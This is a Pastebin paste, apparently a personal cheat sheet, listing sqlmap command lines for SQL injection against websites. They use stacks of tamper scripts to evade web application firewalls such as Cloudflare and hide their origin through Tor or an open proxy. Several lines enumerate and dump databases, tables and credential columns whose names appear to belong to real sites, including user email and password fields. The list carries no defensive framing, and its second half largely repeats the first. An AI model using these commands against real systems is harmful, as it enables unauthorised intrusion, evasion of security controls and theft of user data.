paperline27

sqlmap bypass waf

Sep 10th, 2023 (edited)
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.18 KB | Cybersecurity | 0 0
  1.  
  2. #Bypass WAF SQLMAP
  3.  
  4. Example:
  5. $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  6. $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs
  7. $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  8.  
  9. $ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  10. $ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --dbs --technique=T
  11. $ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --headers="input field header" --dbs --technique=T
  12.  
  13. Example Bypass WAF SQLMap New Version Update :
  14.  
  15. $ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  16. $ sqlmap -u "Target.com" --random-agent -v 3 --dbs
  17. $ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  18. $ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  19. $ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbs
  20.  
  21. example dump DB use poc http post request :
  22. $ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbms=MySQL -D database_target --tables
  23.  
  24. example WAF Header :
  25. $ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --drop-set-cookie --dbms=mysql --dbs
  26. $ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --dbs
  27.  
  28. example WAF CloudFlare use proxy Tor default :
  29. $ sqlmap -u "https://target.com" --data="id=63665%20RLIKE%20-bla-blablabla" --time-sec=20 --random-agent --level=5 --risk=3 --tamper="space2comment,between,randomcase,charencode" --technique=BEUST --privileges --no-cast --tor --tor-port=9050 --tor-type=socks5 --check-tor --banner --union-char=1 --dbms=MySQL --dbs
  30.  
  31.  
  32. --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  33. --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
  34. --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
  35. -v3 --technique=T --no-cast --fresh-queries --banner
  36. sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs
  37.  
  38.  
  39. -f -b --current-user --current-db --is-dba --users --dbs
  40.  
  41. --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  42.  
  43. --risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs
  44.  
  45. --random-agent --dbms=MYSQL --dbs --technique=B"
  46.  
  47. --identify-waf --random-agent -v 3 --dbs
  48.  
  49. 1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  50. 2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
  51.  
  52. --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
  53.  
  54. --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
  55.  
  56. sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
  57.  
  58. --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
  59. -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu
  60.  
  61. C:\Python27\python.exe sqlmap.py --wizard
  62.  
  63. --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  64.  
  65.  
  66. sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
  67.  
  68. sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  69.  
  70.  
  71. sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  72.  
  73.  
  74. --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"
  75.  
  76. sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
  77.  
  78.  
  79. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
  80.  
  81. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
  82.  
  83. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
  84.  
  85. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
  86.  
  87. tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
  88.  
  89.  
  90. --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  91.  
  92. --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
  93.  
  94. --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
  95.  
  96. -v3 --technique=T --no-cast --fresh-queries --banner
  97.  
  98. sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs
  99.  
  100.  
  101. -f -b --current-user --current-db --is-dba --users --dbs
  102.  
  103. --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  104.  
  105. --risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs
  106.  
  107. --random-agent --dbms=MYSQL --dbs --technique=B"
  108.  
  109. --identify-waf --random-agent -v 3 --dbs
  110.  
  111. 1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  112. 2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
  113.  
  114. --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
  115.  
  116. --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
  117.  
  118. sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
  119.  
  120. --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
  121. -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu
  122.  
  123. - sqlmap.py --wizard
  124.  
  125. --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  126.  
  127. - sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
  128.  
  129. - sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  130.  
  131. - sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  132.  
  133. --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"
  134.  
  135. - sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
  136.  
  137. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
  138.  
  139. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
  140.  
  141. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
  142.  
  143. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
  144.  
  145. tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
  146.  
Add Comment
Please, Sign In to add comment